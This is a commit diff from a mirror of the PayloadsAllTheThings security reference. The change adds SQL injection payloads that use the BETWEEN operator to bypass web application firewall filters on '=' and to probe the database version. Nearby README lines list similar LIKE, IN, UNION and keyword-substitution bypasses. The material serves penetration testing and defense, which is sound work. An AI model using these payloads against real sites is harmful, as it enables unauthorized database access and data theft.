mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Update README.md
Add bypass waf using BETWEEN
This commit is contained in:
parent
56ec623412
commit
135af74acd
@ -440,12 +440,13 @@ SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
|
|||||||
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
|
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
|
||||||
```
|
```
|
||||||
|
|
||||||
No Equal - bypass using LIKE/NOT IN/IN
|
No Equal - bypass using LIKE/NOT IN/IN/BETWEEN
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
?id=1 and substring(version(),1,1)like(5)
|
?id=1 and substring(version(),1,1)like(5)
|
||||||
?id=1 and substring(version(),1,1)not in(4,3)
|
?id=1 and substring(version(),1,1)not in(4,3)
|
||||||
?id=1 and substring(version(),1,1)in(4,3)
|
?id=1 and substring(version(),1,1)in(4,3)
|
||||||
|
?id=1 and substring(version(),1,1) between 3 and 4
|
||||||
```
|
```
|
||||||
|
|
||||||
Blacklist using keywords - bypass using uppercase/lowercase
|
Blacklist using keywords - bypass using uppercase/lowercase
|
||||||
@ -461,7 +462,7 @@ Blacklist using keywords case insensitive - bypass using an equivalent operator
|
|||||||
```sql
|
```sql
|
||||||
AND -> &&
|
AND -> &&
|
||||||
OR -> ||
|
OR -> ||
|
||||||
= -> LIKE,REGEXP, not < and not >
|
= -> LIKE,REGEXP, BETWEEN, not < and not >
|
||||||
> X -> not between 0 and X
|
> X -> not between 0 and X
|
||||||
WHERE -> HAVING
|
WHERE -> HAVING
|
||||||
```
|
```
|
||||||
|
Loading…
Reference in New Issue
Block a user